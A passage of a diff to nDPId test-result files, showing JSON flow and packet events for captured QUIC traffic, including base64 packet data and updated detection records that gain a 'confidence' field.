u7sNXnyC2d8RZPQAJe7D4Oh1BQLIpaX6IjRHr6Znht5L0l2uxz2PQHcoUX6n4t3dcGi25AwHjP5I3uYq5MEBsM+ufza0eSWH\/9ZccO0cIAXaM\/ZK7yJ7h18lQa\/XrC6T0H+iG6YLcBs+Nn\/WpfxO0X+Fm0xBv3kc6fJmlJHPrTgM+FCizZiybSl6ku\/j60rHDQ06vpIkk9ZS53KSJzAVvHcMEw4RS9GGhlSYAJux\/nZp6xaRxVAmLGayjkrZg4JqrAaYLUFPZxCYnoaoOUed39DfjyYIGdVO+lFtX93fPnuewUpoX+KmbQlR7Ka10pukI4fioRBdFHiEB\/Gn89KrwhW6ASA0p9Q0Oc5cBfAuigzZZU2MmQFjJi2zpQVTe\/5PEXmeSFsWQCTH3gUt8UDEky7qzZgA+xFi531EMe\/QX6lWUAbOhV9FlVkAVMO+3"}
 00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621417111064,"flow_last_seen":1621417113176,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621417628801,"l3_proto":"ip4","src_ip":"133.205.75.230","dst_ip":"208.229.157.81","src_port":56528,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00623{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621417628801,"flow_last_seen":1621417628801,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621417628801,"l3_proto":"ip4","src_ip":"147.196.90.42","dst_ip":"177.86.46.206","src_port":61647,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02299{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1621417628801,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621417628801,"pkt":"AAAAAAAAAAQApuCjCABFAAViWsBAAH4RzreTxFoqsVYuzvDPAbsFTkiRwv8AAB0I+raMAglwITcAAEU0GmovP+mvsihl\/92QhcJt6i9xOCuhIR8v+QVQPDfpj6BytKt4QkFnLk36FAbt80sJIp\/Y2c7pKVYoBF6gfeinYt9EQsJeq7ROnY3ivJapj2oaHwAzsZa4wHPnbSp5Fzk6+XETr+Q0x6NnHbM3zNCM2AaHMspi1VAViZWQsrRPrT26HUJgBdgrtSBr704DAlp8NIBOTaYQmRsLw0sO8kaVUQSTjBt91sODuXuJFBlvmd0rw7Lx9XhhtXOEq8peMATmMSiGkCnVtuHU9IHl7xPdTUKOwX+iqBEfcVUDuMTWTQ+xEjmygydvmbpLt++lwihva2qbwF6QkkfAhzI1WNSSRrlwUFqM+Zsvtnl9miygOu3MVINYanFJshDLLhtcYcppiQUtPQh8neggpYf3NcqHcOg9yFih0GlvYXJgOAi0eylABT+cl7jZZQ2\/9NICqkeHp5SgtJZ+rnT0jfRUKImzpisiXxL0gUjRhZOBaNVTw2DFuXCxQsKg\/KU7zvbCtbjOLcFIvgcvLg+YOzho2mATZS9Qfa20oAzRIDxCf0U\/g2Kp\/RjvwWjL8Qf3VcFus3W9PJibs38Cnb8fC1OmRScNRTKV7pwvzBngo0k14tTrnFD06xzFU4K0vUGZStljl\/FAwNVIMnRWjsQn89AVyrUyoiyAS9a+w+Ol\/IuzeZupo9JHvpafoLvt9p341rnuNTMpuiggzG1a\/AJiehCdHVju6FHVk25Y\/MvQwUZ0i\/jES6yQR38oUqlnXVrq+fKrSE\/9kcUPuinfPVwCAVdLSD\/ha7TenkHZGDajCF77P2QxcTnluKJdVrDlQTARcyFrPTPqYJkQ\/NBO4Q2LUqkPKdSNg8BTKf9ErnqfzfLyF5WoMGjiT+xKiXVVojRktrJCp1vh\/UQZ5GB7zhzqnM6KrzPyc3Lxp3Bb7qVApnsRGOqMr1ngaD2S5zZ2FCX87pAvyMSivW4aYtM\/FgZ5fi1KOfYRKUUTVabBR4V0TSKE6XBOLGcK6tn4xBlT4YzAm4R1HLGrMHJVUw1kbq8I1GPUl2Oe80wpsoTflQ\/7rxCHFRENvTpUYufeWaZVYdHvgsMahyyxgCBnT2nc01NamKM3ocOAfaIGcBY\/TLk5FbdJIlfNuzsvYmFgqC9vpu4ElbzDnAVfSEDcO9fSa+\/JxpgCfB9tsQNpFDTYAu1e0Ss3GB+O8aZWjtRVkhzocpK8euQFsHuPNYkc0XzFUPsLBkPlcmTbK4YVnrIapDZ744rfE93ooFZIUkO7Ch8oLzqK0OtBOsGmVGFTbaVf+NhQknLLOENbTcHT7F0rxbWFDU++4qTR\/XmfJ+wUTJsT+\/quj3VddN9kLF9L9a4EgHNqz15osfhMQWW+l0C3k2t5fh5I4ZCw28kLSE6kXpe3jSgb7PvPC1LSkSgWYuXB89Kj+qTD\/cFbalGxIJb\/WgzJZn6Gd7R+R9Uf44YjcRfaKor1OTqri0mpCgDnlcKZQFUkScXWdMFAepcOEwVDvTUtXG4T0tMPM\/db0x58pCBeZHjWa7wiz\/JWqOATbNaNGCr6YxqPK79sl3n3mgQubt+x0eKINEGpxaZgah4UluP1BWQh4YfISLcQeFbuVb8GjyINELyA1nqZY4Rm0zHf5sR3fkBxRXy8m7315bG8d2eGbZxchn62uWz60SggwIYaJ0ECuYBFMzQZtKNYAvyGaZftALbKhVzxh7mgcomFyIRc7XwzM56SXrPBzXgho48l4M8VVXrs3DqFKC1\/kSw7iV2kg2+Vlrpf6i2uga0t"}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621417628801,"flow_last_seen":1621417628801,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621417628801,"l3_proto":"ip4","src_ip":"147.196.90.42","dst_ip":"177.86.46.206","src_port":61647,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621417628801,"flow_last_seen":1621417628801,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621417628801,"l3_proto":"ip4","src_ip":"147.196.90.42","dst_ip":"177.86.46.206","src_port":61647,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 02291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1621417628930,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621417628930,"pkt":"AAAAAAAAAAQApuCjCABFAAViWsRAAH4RzrOTxFoqsVYuzvDPAbsFTm8Jwf8AAB0I+raMAglwITcAAEU0pjC69lxL17I2Vm\/2Q1yiyTryhXfWfRIufhNP5rg4c+FEuOp6GqQUQFPIcqWk6U0BDlkVmnmwl9dIFWmX\/bKzitGvZ8mfDi9hktZWexq37TSuAH96QNRoeDy4tvPiSgKIr6FZgR4Q\/HVISWRrxFL0ZKD38sgIoVYjPEx\/9Ic4WOpPiBg1t9\/qrhQHH9cTVMgWsLt0TDJTL0KZv3cMnUOIyDfZegNZ4jvz12dVBYTIdmKO7+1d6Z2\/OF7H8egyUhxpPD8g63YnzjMgsOVESGTopFXkRNnrC5YYuCPBc4+8zyPzWbaRA7ZY7Dj7GHebUIt0h3Gw1DMiRq+wjLGQycx78BHNpTa91SU5Z8OasixP0ARhcYJ7QKV8jqRLQIZ4IpBhgMNdrO8Ggn4V1al1n25AZ\/Lyk1mcCfIi5OinaMRv84l92mkzRek7AiZLH1nKN7U8\/la6FOtm5DE6vEcr9GZeZ4g8aHUkwBMbmP+13DolPMOI6DGfrXzZ7dBsZ4wbQKaGjaOhZc874uKqQ4j0o8xXhMGNRmGzqEw0XLrhUHdOwIt3sXfKa0kWZzBhThe9vA5yuf2IJle4m+JLUJDIrj8NkmAliM5a1Ztu0S1CjbeZwlZNEfqXXuBJ3XmYBU6x4TRQAywkhzhzUXIItcWXIsLEo24LH25n3fHel8z8SAJtU1rYW4MJ3cHGCieRuLa9m5WyLoD8MhHU7jK16MqrtWsEA8LCVJ4hJcCGC0d0cGJ9TmpzgM8fitFGSMldwBt1v31w+KigRFbv3PGq15QaFu3Bc5ghmXY2tvuPrAPwDQ1dcf4BaQoD2VAGVaIncU5tvynrQteTCLDkNbf+kZJa2SKp54q2Z9Fns9c9jt0T8RlL2p3YHikPu7llSazlfLXFGeGzoDJGGsNxHPldt9to6lNcm7BdP4mkNcgatPDawW4pXv1ns4BEQlIqeGnHJbtHqijRNTuEtZwIuRhW\/Knz7OtExuPugeU8Zt\/GlPfZScOWlEiLrc05jYYCgWUXmqy179xmcMucA9Wtytp06aBHf+WfQ1fURy3jSmQ3NJ3gv81uQ5roWC\/f151I1SnpAuoNl\/wshFDWrHEG7wosMoA69VM5ioRjUH6Vw6vtLsEkJmdXHbiLelXmCeiv5o5cjuB7D+CLbcHnxi6S1s4ouqpxdZyMBB3jywu2tIYU4QKiN+fjaYMDYwpAzD5Jb2Fn5An8ebr2twQ9IO7dHcApVPzom1G8qYIs37w2OByHgFyhjSn3envhKGKlaF+DnxPnqjkcDSypaV6Xw6EsGbkUEBsPWaFNAQl0rYQv4OIQSLLLDbtnqJSJtFqJvApbEkL5FOujphAtNX4TvOYetM3s\/ZH5TkEvzT+bgZWz2mB1oMOoQPy213DWxLIhN9Sus3pIVPH9KUpLVArxCusIojjl4y\/CVvWA5XX0iWrENm1HaA6F521QuNa+s5DzOv42QgWOr+s5uNKSTFxAahQlQrNplOZsHircGL1XR+n2uD2gTgWAAY3b2i21J5cYoe0Z\/jVWlplRHgm1fBm8iBceAe+i8eGjb4bPc5PfJZ8n+JrHrN8SDylfFnIiRNE8ID8KN8lkbNu3\/oS3Kih\/K85WFq55fup233gxsGiJl3pqoHcF8IRFeJ07vNzBh1QaRlhGdke5sCCm3DG3xbt+UWW7rCkqr05j2zGYZdejMwOKkfbRf6NbqQKPeIcLIlv2bkyG3CDxjjE97A5SRMMjRaI2D9gkNO0\/wn3W0x5srM6qZB5BFLM7YG15trX9AF3w"}
 02295{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1621417629532,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621417629532,"pkt":"AAAAAAAAAAQApuCjCABFAAViWtRAAH4RzqOTxFoqsVYuzvDPAbsFTrDqwv8AAB0I+raMAglwITcAAEU097Xe2il2Zegu7U45BZ8gKfm75BdOnPJC97WfnE5KscE98sHvgzGhWttrfuN5Zw6V0RznV0lHr8X6WifmddIwLz9dgmQayfKTYym3Ekq7+FTfsVbmdLv7iDTySVEQT3U6aJZTVVfr48rzDdUlbuOabtPNfF9PK4wxRo28Hv8rNIeQLcDYX1ZhINEmN+sLvvHwjXJJn\/mGzxs37Wo7yOZbGkbY30QHlElqBOAjfC6VA27GzLEtJY\/bgqKUM6kS54RZZNzg5pKpLNlhxgP248e2xlGMNOmp4fMFXgmg3EfYbmnl2iWasHW8AkLql7Ucnm9wslVj\/YWb2c6IF2fyJjiByU3v\/tWqKcs4QGqfKnNSz7TAvliCZNV6Zo4gfpjCqzFPRaJI4yeyyqsAh\/yIYVP9ZV+w7uilAeMXgI+K0KIlxsOhizEgVDitG\/KAo9LOeN6fomCXq4209QrcrNd3XMwKvH9b188UgNv\/jRvXciyaJGIyMgJ7mamyBtbMq07La5hMyvo0mSqFOXeW1vGdKnMpuiGY5RTAHMnhNlkaZqmORAjp34HPN8n4vG44MH5AJ7tXiPcaAMzbgdmd6ox3fd0BfTrlccudwRllV1uZTxS3xRBBhwWhqTZE4FhxMXqd4endwazGj4NY2Vq7gD8YwyUO508LgWL2kYAd\/HfPDFLaaugd7M4tl4hSFuXNenTPDtb\/bRXBfDbvsb6xXiRig92+oFBV7pEoV5L\/yiJ4P2gax0Ac11TG31dQqdzo9z3YfYxfMa\/+8LYBIBydV8pcGIzVQDhSjN2LC5nUQOTcNfPU\/oVh0Ybk1aIMEU85MfYtwrsAgUEMpEGProetQB0mTzcYq+lEmbIIU8WPencLFFFL9uSVHveeIfGWVYNsJ7jljceMSgP5H6cv7CnQzsqS8dQ4uaXalyrjBXDSyJmCkDvaY220xAc3pj12kdE4BvFmAtStxWdtg66AiG7qv91s5V3en6J6UAronI\/KmR8EOk5BiV2TYsFERt4G27JNG5X\/AJaZ8VwtC2WsqvDKaMKYDTCCbRtilBnZ79PJ8INFhsaJtQDLjVGnL0+0lag21H2c0AgRlVIciNuUToDrQp+pYnpr3L\/mM63uQTkvv5eBIAP7i9VCEUjMABfjlzuA4QlRNUQ0vfIchW72uzMqFErT0XMVPnKFlDHN9TDNIkKHDeKZQaWZA\/OfMsV7evfLcQ+ddG\/xKNaoq8806UcjLdGTZEiKme6xLw53P6MT79sTHldTCpjPaldQ3tMH4EIg1InZbS5ktmIvlLQ2zHCeJ+cCrcDav1P0xMr+DLvH3rXDc1LTF\/hYsBxIYeS7vsQF07Zw9I0Aabf0GjuxOlwnW2Bt8iPysdcUeHkriGdeS3Czvq\/nkZEaGKcHJEnfklzqeTz2bYQ+SkshE9F12pfc0agQ0tbVdAnKaEKIsSgzPUMt7MgzYsL9AUkoIblqKn2hXfFXW3gr6XbSi5TQygflSMy28Bs+5OghyrSNcFcOe8e+DTn5mmzjD5O4rsNuXEgF7wS26+FyMgZbWHqX8HMifw3qMfcAQ1nT3l97zTbszeFs6\/goTc7uST7XEMKSKrS2lP7e\/ELG11fN8X22oM+TfVd0wylz3v0e6ThdB\/tMpVkNfw82FE39BRdoKw04E7yZ9lgCOyxJvMvSEQRhX0eoTiGgfBQDAhtTklq2Zr0UEwX8LiDkDQg8kHbX+ady095CUYxnxCvxjTB8g7HIHtQ37uzrFXIL6Nxg8bDtLpiJue2jB8lwh4plomig"}
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621417628801,"flow_last_seen":1621417630732,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621417630732,"l3_proto":"ip4","src_ip":"147.196.90.42","dst_ip":"177.86.46.206","src_port":61647,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"sb-ssl.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}}
+00932{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621417628801,"flow_last_seen":1621417630732,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621417630732,"l3_proto":"ip4","src_ip":"147.196.90.42","dst_ip":"177.86.46.206","src_port":61647,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"sb-ssl.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}}
 00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621417628801,"flow_last_seen":1621417630732,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621421253470,"l3_proto":"ip4","src_ip":"147.196.90.42","dst_ip":"177.86.46.206","src_port":61647,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00623{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421253470,"flow_last_seen":1621421253470,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621421253470,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"212.22.246.243","src_port":55376,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02299{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1621421253470,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621421253470,"pkt":"AAAAAAAAAAEAnT6cCABFAAViPLlAAH4RBzKokEAF1Bb289hQAbsFTvjXzP8AAB0IFOutyi98gDkAAEU0QEoUNnfb6spEl4sOhm7a3kYwPyh0twGQme8gnUbSWjlTM0eV\/33jZKgt8R3qtWDm2zSx\/rpQpEqQQvknW76YTyqy8lhhBH0HTupzxapnAU360wL\/+pHUQa9kkbfGs+rg0fJIwO92cTdSFU4vLU7xVz2fVMJaMQH8aHE\/1fVdWPC5x1T42ZLsnrxIMQ5wxIFrryrh15fMsCUmzvgSHxA\/i23NsVEQK0FaymSQ3vTxzLlBUWH4BZEKhwxODiawYJVn6KqbmqIqOPZjXiYZhiN\/Oc0\/LeCyQFaH1ri9xPnu4k\/db5yW\/Vm5M7J0u3m8iCZTpmZh9UW7Vz+Tt6ZtpNNUgyHlXEXFJ93VOxKXczX6MviwyGemHWSQL48Z\/padN7yuSlVEbH4WE\/x\/ebW7zTY276B4XQ+wlkch4ZzVURSVv2IJCLTAANRAmruSTCorJVR33qh+1laWpf0XjXQiid5xdrcBQeDZrONgOO69EM9SiLwEVtc0TpitDpJidyT0U1tQrFl70d\/XEPdy6sl8efWo7ZCqMlidLhPlq3NrVHxg4+Rm0hcmtJgElwEuqTGiLadNGhoT7Yo7j8pSYgNw7GRtSquhp7H3+FF2Y2bFNX19Z9+rRsJB4pUiilB5tu0adouOMnwmGTBRsatrnFOOtA0F2vX+LGN0MZFmEF5dpYuvWiLOa+K0fw5uMZaD1DwO81ez++YVlEQYMcGk8nRbrvkTr\/h1NjMg4AGD90jQKUb4FofQXWaVczScZMMs2v2AijtxxRDHmaMhESOLxFfFbAGY7GSyIn06ETBx10YXRTWxeT0eUKlaLwKeXgT1f9Nzee8owqgOKrkqV2dKYlj65fZbe64rFKZ1qmuSQpeN6luwI34bKSC\/P1YZm224OWk7dK8zYb6iVGqzON\/pvHnYbfT2ttIlhWIYxtY8Ju6yt1zHvLgcU9f83bCChlVephnGaWCxUwUlXnYZevAlJBygTGyZxTz2ZSb0ie32uT7qgPEA8\/VhOVmgfgz5uz1CkH7wK301uXB6Jd+vCV5C\/oxE\/jofm4fBRgusDmoz+6N3GpdbS6mlSoo0uqerAGszdbsmbuicOljSko4OAeqWoT+mGW7afPjx5a2FUCfO2SrBsu8hZPpnDhlhRCeKCJQcAHRB7xgiDd9eCcdbKD7Wu6I5NAMZ9c5cy\/ihBVX35Z+UgC3RyusmI0NtKYhjUDswCM0eyBoXLaZPl8INR9v1LW+yvOTZym8K9Aj0qNkha5Yzfvxik20hZiRqz1bdL8xXLCFYqYMYQEadOjp3L+P6FsQzEDaOxkrn2NuRIxBUQl17JREUFH0XnFwFnMT7z5vgxqMs+\/cTusvocWbp9TisAPxAunu5IgIhjJTjwzvXKQEqGGTx\/Uv95lseYEkyPjUxRZUqo6ayvxQzUbD7WzEPJfWp4V0dKCqk8jMcfr4gKrj2FSp8Pp2y\/+11ISOglp7xB6eIZFO0ZgRIY37WC1adnktqCSKXkgYJUGB+Oc8sMK4ta5iGShCsKCGNc84cXtiEBSa78agZzOMcgLZMHRXRJQcxDXBaC6GCHQXnLhoom2lIO8IpQOLCvA+fkPsBsI1oOJHnHV8O+hHfPFWWAiSD\/PB9nE4NwaIPKU4ZyWnacfkkFlYLZfqca8KZX4UtWN\/IEVTbG6\/oU7nJ0oyYFSxJfcA+XMb3hdr7h9ytVk4VGIeEwTkm3q4IbP0kGL00wYVhVU92VFVVNJemgeHNnaAUtTEkhmyuDDVqFnLFxbtyS6nB8YnwnujNnjXs"}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421253470,"flow_last_seen":1621421253470,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621421253470,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"212.22.246.243","src_port":55376,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421253470,"flow_last_seen":1621421253470,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621421253470,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"212.22.246.243","src_port":55376,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421253509,"flow_last_seen":1621421253509,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621421253509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"133.202.76.105","src_port":64964,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02295{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1621421253509,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621421253509,"pkt":"AAAAAAAAAAEAnT6cCABFAAViPLpAAH4RAAiokEAFhcpMaf3EAbsFTviHzf8AAB0Izn33GI1xCTwAAEU0Q2KPp18EaD7CNRYkzOIN7dKmyWbS+N+cMemkf0psuzAGPfIWZySwPChV53Otv2dvXoDe3uezGPqpumIIkBf6E4Y8ZQDOb1kq7QnyaNj76pl0Rg6iP52gI2ik9D7s1o3thkJPMbsfxV+fuIPAKjePBjQmUP19frND2eTijGA2Jo0+u9aOzf5exzhhFq\/6nELW9tIN5cnw1mNp97ad1+XFptBiaaHUht\/AwUETMgLsBZ6XrHBGlpBY2lK8op1hzm0CnYVtS3Djsl5T\/wl54X2bN40BKcjIeQUAIe+9lSfAyX9VzGt1lyeq7sDtfGOULnyc3MRIbszfJgkdcma4KWIGUispqWzhbI1x5e\/RjTMlYyCVLmuxtCNhv9eaj9oPhvwV6QA3gM9QoCLiA0CWKH+SJGX2Rw5rZxYoMKeut8jwQsj+lIDaZR9I2\/AyKbpAZBbM0cPn5VbbglsRXZxJcp2ZEFpU9VJWoFGfCqiok1ySmzzALJ2o9fBW3oS1MBkHpHdYLwXsXSSHZum4zp4LAa6hwGEqhfT3QKMIosJCyQXQx90hg4FPeCfhcCzS0yMxKuIS7muPu13HLa3vp6BZSjDm+YGM2\/EP2rfLAV\/u73iBfyrpH4MVfT6XT9GH6DxrXWXPtmgj3dd4ZDJSS2EE1yZ7NzZKZHIzRIJhx+M60uskyfvEmdMlqpu42sPL14XVPHdNYMnoUS8X6WLni0o2VZmxQk3SYBjLMZKHNJZHUGBqZyOnDiDJEDUgCVpgpbyumDZBrRfKCG8xPvowcATyQ6821WIR6CIzs8Om8jqqi0JAvkN016aaA1p5ZCJQtyIP7RVszaos5bQYBNnQzPdcPSfCMMPRbEcbBLR\/8PEjZSJVMTynsuFnVR9jIDV8r\/dX3HTmyKXTIz0yNwtPT4H5hqTdaTXb7oaS8Zarj3bCmVeadB08cU+k5BSQkWcmvSsbxQK9L6WXdRC9SodhjDB9zefiVEPcSl7soHeKsNvYTyCkd\/XAIWMwe3bRjY+Kv\/KQy8Hwi5otEn\/W6Ht26F+Edg2+van4m7BF2EhqU16TwOM2sNd+iloXCcatqE\/C3MKqQU0Mkp2P+yV7oFIESvsIr0RB7rv76hjn+agd\/IgZmvvKb7bk9hq2XrH0HI1yi6DgeQgXvNKOZmzlAcpcvnqKhOiyX1pKXCxj5WdM8xyZrw7dWBYG9J+ZB2jRzA3N6g9gR5j+cHtRybtWCobPi0uMCp5Y\/TwozHIDGhNtykeb7ruqTg++bwL4cJPnLkfBMRka0gmne2r23CHGqUhUs182QVxVo33BcapLgO3qmkaZWUAfgES6E9cYn70KRY9mjRR5JB4LkRsmI2UaT20HAZw+DxdsM5YLqgbKe6dhNV2IOrhV\/TxAVxh6mwBPFC3umIWlZnFUvPCLyY8UM10QQ71eYC1SJ9eB13EtUmpWxQLGyueBG7P4\/oLKTc8PuLFHXfG9dQSOw1wE33A+f\/cnDT1FhhN1YqVpJQdPwJ4Wf5eVBxsn9JpIRrPWbarviWoroALVlD67VbRZJNKwOmE1HEEKRQZwrLkbev1NeFysxZPm4Y3TUawK2sEWayDygW6x6RN0NNG2Fay3n6wsNuNc5zitBxQaUj7zNSVElsX4h6XDvK98\/ECQwIKitJALgcMqiEiqaEc6pa+ihQlR1KKvzUudiOciEKxejDPhTjufOq\/UxVIzxEe1epyXEZvbVAZDgleZWCCPNPFEFpRRnINh23vNKajIxj\/Lj7QDAzP1y74FtJQ6jIyHxOrz"}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421253509,"flow_last_seen":1621421253509,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621421253509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"133.202.76.105","src_port":64964,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
